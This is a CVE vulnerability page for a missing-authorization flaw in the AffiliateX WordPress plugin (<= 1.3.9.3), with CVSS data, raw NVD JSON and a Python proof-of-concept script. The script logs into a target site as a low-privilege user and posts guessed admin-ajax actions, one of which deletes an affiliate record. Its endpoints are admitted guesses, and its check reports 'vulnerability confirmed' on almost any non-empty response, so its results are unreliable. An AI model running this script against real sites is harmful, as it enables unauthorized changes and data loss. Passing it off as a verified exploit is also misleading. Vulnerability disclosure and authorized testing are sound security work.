Security Vulnerability Report
中文
CVE-2025-69346 CVSS 4.3 MEDIUM

CVE-2025-69346

Published: 2026-01-06 17:15:47
Last Modified: 2026-04-27 21:16:25

Description

Missing Authorization vulnerability in WPCenter AffiliateX affiliatex allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AffiliateX: from n/a through <= 1.3.9.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AffiliateX WordPress Plugin <= 1.3.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69346 AffiliateX Broken Access Control PoC # This PoC demonstrates exploitation of missing authorization in AffiliateX plugin # Requires a low-privilege WordPress account (subscriber/contributor role) import requests import sys from urllib.parse import urljoin def exploit_affiliatex_auth_bypass(target_url, username, password): """ Exploit for AffiliateX <= 1.3.9.3 Missing Authorization vulnerability Tests if low-privilege users can access admin functions """ session = requests.Session() # Step 1: Login with low-privilege account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Logging in as low-privilege user: {username}') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Login failed!') return False print('[+] Login successful!') # Step 2: Test unauthorized access to AffiliateX admin functions # Common AJAX endpoints that might be vulnerable vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=affiliatex-settings', ] # Step 3: Try to access or modify affiliate settings without proper authorization test_payloads = [ {'action': 'affiliatex_save_settings', 'data': 'test'}, {'action': 'affiliatex_export_data', 'data': 'test'}, {'action': 'affiliatex_delete_affiliate', 'id': '1'}, ] print('[*] Testing unauthorized access to admin functions...') for endpoint in vulnerable_endpoints: for payload in test_payloads: url = urljoin(target_url, endpoint) try: response = session.post(url, data=payload, timeout=10) # Check for successful unauthorized access if response.status_code == 200: # Look for indicators of successful exploitation if 'success' in response.text.lower() or response.text != '': print(f'[!!] Potential vulnerability confirmed at {endpoint}') print(f'[*] Payload: {payload}') print(f'[*] Response preview: {response.text[:200]}') return True except Exception as e: print(f'[-] Error testing {endpoint}: {e}') print('[-] No obvious vulnerability detected (may require manual testing)') return False if __name__ == '__main__': if len(sys.argv) < 5: print('Usage: python affiliatex_poc.py <target_url> <username> <password>') print('Example: python affiliatex_poc.py http://example.com/ user password') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_affiliatex_auth_bypass(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69346", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:47.110", "lastModified": "2026-04-27T21:16:24.673", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPCenter AffiliateX affiliatex allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AffiliateX: from n/a through <= 1.3.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/affiliatex/vulnerability/wordpress-affiliatex-plugin-1-3-9-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}